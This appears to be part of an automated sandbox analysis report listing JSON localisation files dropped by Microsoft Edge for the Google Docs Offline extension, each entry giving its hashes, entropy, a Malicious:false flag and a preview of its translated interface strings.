                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3122
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                              MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                              SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                              SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                              SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1895
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                              MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                              SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                              SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                              SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1042
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                              MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                              SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                              SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                              SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2535
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                              MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                              SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                              SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                              SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1028
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                              MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                              SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                              SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                              SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                              MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                              SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                              SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                              SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                              MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                              SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                              SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                              SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2778
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                              MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                              SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                              SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                              SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1719
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                              MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                              SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                              SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                              SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):936
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                              MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                              SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                              SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                              SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3830
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                              MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                              SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                              SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                              SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1898
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                              MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                              SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                              SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                              SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                              MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                              SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                              SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                              SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                              MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                              SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                              SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                              SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                              Malicious:false
